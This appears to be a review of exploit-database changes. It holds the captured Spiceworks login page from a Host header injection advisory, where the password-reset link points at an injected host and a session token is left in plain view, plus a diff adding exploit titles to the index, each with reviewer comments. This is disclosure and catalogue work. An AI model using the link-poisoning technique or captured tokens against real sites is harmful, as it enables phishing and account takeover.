SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'});
jQuery('#install_chrome_frame').modal();
})
function upgradeIE(){
SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'});
window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie";
}
//]]>
</script> <![endif] -->
<div class="sui-fluid-container">
<div id="content">
<img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" />
<div id="container">
<div id="wrapper">
<div id="float-msg">
<h1>Spiceworks is ready to rock!</h1>
<p>Please enter your login credentials.</p>
</div>
<div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div>
</div><div class="main">
<div id="flash-container-for-sessions-new">
</div>
<form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div>
<div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div>
<div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div>
<div class="control-group controls forgot_password">
<a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a>
</div>
<div class=" control-group"><div class="controls">
<label class='checkbox'>
<input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" />
Stay logged in
</label>
</div></div>
<div class=" control-group"><div class="controls">
<button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button>
</div></div>
</form>
</div></div></div>
</div>
</div>
</div>
</div>
<div id="footer">
<hr/>
<span class="pull-left">
<p>Copyright &copy; 2006-16 Spiceworks, Inc.</p>
</span>
<span class="pull-right">
<p>
<a href="https://www.spiceworks.com/about/">About</a> &bull;
<a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull;
<a href="https://www.spiceworks.com/terms/">Terms</a> &bull;
<a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a>
</p>
</span>
</div>
<script src="/assets/wizard.js?7500070" type="text/javascript"></script>
</body>
</html>
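Review bot: The capture includes live-looking session material — the `spiceworks_session=...` cookie in both requests and both `Set-Cookie` responses, and the `authenticity_token` hidden-field value in the login form — which advisories normally redact even from a test instance; replace them with a `[REDACTED]` placeholder before publication. The concrete impact is visible at `<a href="http://google.com/wizard/password/new" class="forgot-password">`: the password-reset link is generated from the request `Host`, but the description only says "arbitrary links"; stating that reset and login links are built from the untrusted `Host` header gives a defender the actual fix (configure a canonical application host and reject or ignore requests whose `Host` does not match it). The "domain fronting" remark in the description is a different technique (SNI/Host mismatch at a shared CDN edge) and does not follow from trusting the `Host` header in link generation; I would drop or reword it. `Response:2 (Forgot your password)Link replaced with domain in the header.` → `Response 2: the "Forgot your password" link now points at the injected Host.`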


@ -39381,6 +39381,10 @@ id,file,description,date,author,type,platform,port
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
43667,exploits/php/webapps/43667.txt,"Zomato Clone Script - Arbitrary File Upload",2018-01-17,Tauco,webapps,php,
49296,exploits/php/webapps/49296.txt,"Queue Management System 4.0.0 - _Add User_ Stored XSS",2020-12-21,"Kislay Kumar",webapps,php,
49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,
49299,exploits/windows/webapps/49299.txt,"Spiceworks 7.5 - HTTP Header Injection",2020-12-21,Ramikan,webapps,windows,
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,
43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
@ -43289,6 +43293,7 @@ id,file,description,date,author,type,platform,port
48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@ -43509,3 +43514,13 @@ id,file,description,date,author,type,platform,port
49287,exploits/php/webapps/49287.txt,"Alumni Management System 1.0 - 'id' SQL Injection",2020-12-18,"Aakash Madaan",webapps,php,
49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
49300,exploits/sco/webapps/49300.txt,"SCO Openserver 5.0.7 - 'section' Reflected XSS",2020-12-21,Ramikan,webapps,sco,
49301,exploits/sco/webapps/49301.txt,"SCO Openserver 5.0.7 - 'outputform' Command Injection",2020-12-21,Ramikan,webapps,sco,
49302,exploits/multiple/webapps/49302.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49303,exploits/multiple/webapps/49303.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49304,exploits/multiple/webapps/49304.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49305,exploits/multiple/webapps/49305.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49306,exploits/php/webapps/49306.txt,"Point of Sale System 1.0 - Multiple Stored XSS",2020-12-21,"Saeed Bala Ahmed",webapps,php,
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
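Review bot: The new rows are inserted out of id order — `49296`–`49299` sit between `43667` and `43676`, and `49294` between `48716` and `48720` — while the surrounding rows, and the `49300`–`49309` block appended at the end, are ordered by id; moving the five rows to the tail keeps the index sortable by id and avoids merge conflicts on the next update. Row `49307` credits only `"Raffaele Sabato"`, but the advisory header names two authors (`Andrea Bruschi, Raffaele Sabato`); elsewhere in this file multi-author entries list both names or a team name, so the row should be `49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Andrea Bruschi, Raffaele Sabato",webapps,php,`.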
